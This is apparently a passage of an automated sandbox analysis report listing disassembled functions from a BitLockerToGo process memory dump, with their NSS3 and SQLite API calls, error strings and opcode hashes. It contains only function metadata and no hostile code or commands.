                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5E7E27
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5E7E67
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C5E7EED
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5E7F2E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c5cf1f8d3dbea8fd9579101b5996d8d7fec100933eb695aad556e84bcf3c78bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b65f758125dd6588ba8d413f583276814a24c85d74d0268a4a57c4e7e98f9a9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5cf1f8d3dbea8fd9579101b5996d8d7fec100933eb695aad556e84bcf3c78bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F61B370B042059FDB05CF65CC80BAA37A2BF89348F1849A8EC195BB52D731EC56CBA1
                                                                                                                                                                                                                                                                                                                                                          Function 6C5CFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5CFD7A
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5CFD94
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5CFE3C
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5CFE83
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C5CFEFA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C5CFF3B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1169254434-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a58aaf514c128f4825f605058c9cbccb08633aee0c90373adde4a6547c2337f0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: adf11a785e5df2c79ca56a4e40d438d6e79fe7640cc35fb2565651336dca73ec
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a58aaf514c128f4825f605058c9cbccb08633aee0c90373adde4a6547c2337f0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C516D71B002099FDB04CFA9D990AAEB7B1EF48308F14456DE905AB752E731ED54CBA1
                                                                                                                                                                                                                                                                                                                                                          Function 6C712F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C712FFD
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C713007
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C713032
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C77AAF9,?), ref: 6C713073
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C7130B3
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C7130C0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C7130BB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 750880481-4279182443
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3e13428ea91461e0867d7fd2b5bd49e7b86b9546c949dcd39b0b9a7843c709b0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c48e37c542bf1b6b7667303360127e3e865bfa222fe718015545185afbc93693
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e13428ea91461e0867d7fd2b5bd49e7b86b9546c949dcd39b0b9a7843c709b0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0841BF71604A06AFDB00CF25D984A86B7E6FF44368F198639EC2987F40E731F955CB91
                                                                                                                                                                                                                                                                                                                                                          Function 6C658CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,?,6C66124D,00000001), ref: 6C658D19
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C66124D,00000001), ref: 6C658D32
                                                                                                                                                                                                                                                                                                                                                          • PL_ArenaRelease.NSS3(?,?,?,?,?,6C66124D,00000001), ref: 6C658D73
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C66124D,00000001), ref: 6C658D8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6C66124D,00000001), ref: 6C658DBA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                                                                                                                                                                                                                                                                                          • String ID: KRAM$KRAM
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2419422920-169145855
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e2b2292675543c21b167b360f632c9cc71b12c546005de35c392a6ccc76d8c64
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a42bc80bf8e853b8cd1a7b8b87c44282b8c43664dfd45271e98343f7d1bcc858
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2b2292675543c21b167b360f632c9cc71b12c546005de35c392a6ccc76d8c64
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F2191B1A546018FCB00EF38C58459AB7F0FF49308F658A6AD89887B11DB34D852CB95
                                                                                                                                                                                                                                                                                                                                                          Function 6C750ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C750EE6
                                                                                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C750EFA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C63AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C63AF0E
                                                                                                                                                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F16
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F1C
                                                                                                                                                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F25
                                                                                                                                                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C750F2B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                                                                                                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2948422844-1374795319
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3e7411e68942f896a0a73721a6972d52c8103ce544d278d01df388bcbc321684
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 85fcb90c58ff4aca03cefa121e71a6d19fa566df8f3d535bf38c7153acad75fd
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e7411e68942f896a0a73721a6972d52c8103ce544d278d01df388bcbc321684
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC01C0B6900214ABDF01AF64DD49CAB3F3CEF47368B404074FD0997751D632EA2196B2
                                                                                                                                                                                                                                                                                                                                                          Function 6C731C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=cl,?,?,6C634E1D), ref: 6C731C8A
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C731CB6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=cl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1840970956-2776173433
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9ee467a0b94b7068b3c43352a001f38fd3abd295884cd86987e6d5741d3f1001
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4dfdca1b01f3584b473fcc32fa7237269f5daf5a5d89d5f7e6499af2be014f56
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ee467a0b94b7068b3c43352a001f38fd3abd295884cd86987e6d5741d3f1001
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C0124B1B001044BDB10BA28D91297273E5EFC638CB15487DE8489BB02EB22EC56C761
                                                                                                                                                                                                                                                                                                                                                          Function 6C714D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C714DC3
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C714DE0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C714DDA
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C714DCB
                                                                                                                                                                                                                                                                                                                                                          • invalid, xrefs: 6C714DB8
                                                                                                                                                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C714DBD
                                                                                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C714DD5
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4c41aba998f9945f2e1d693236919f08015a2dcd09279d8be744277975f36d19
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2170b05fe74872ef4d13c5d9403ce3f1cfcbce6edbce001fe55ab50548df9376
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c41aba998f9945f2e1d693236919f08015a2dcd09279d8be744277975f36d19
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F0B422A2C9686BDF104155CF13F8637595F0272DF5A19B0EF546BF52D205999082A1
                                                                                                                                                                                                                                                                                                                                                          Function 6C714DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C714E30
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C714E4D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C714E47
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C714E38
                                                                                                                                                                                                                                                                                                                                                          • invalid, xrefs: 6C714E25
                                                                                                                                                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C714E2A
                                                                                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C714E42
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b2f31129cf9fbd353b25cb332b27fb54227642604978231ae6b500031a615d3f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a68aa6b98c2958c707dd2a3011cbfa1844dcfe77aa38f4c7a359fba93354ad85
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2f31129cf9fbd353b25cb332b27fb54227642604978231ae6b500031a615d3f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2F02721F4C92C6BEF200165DF11FC2379E4B0272DF4D44F1EE1867E92D2059AA952F1
                                                                                                                                                                                                                                                                                                                                                          Function 6C680C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,6C681444,?,00000001,?,00000000,00000000,?,?,6C681444,?,?,00000000,?,?), ref: 6C680CB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?,?,6C681444,?), ref: 6C680DC1
                                                                                                                                                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?,?,6C681444,?), ref: 6C680DEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C642AF5,?,?,?,?,?,6C640A1B,00000000), ref: 6C6A0F1A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0F10: malloc.MOZGLUE(00000001), ref: 6C6A0F30
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6A0F42
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C681444,?,00000001,?,00000000,00000000,?), ref: 6C680DFF
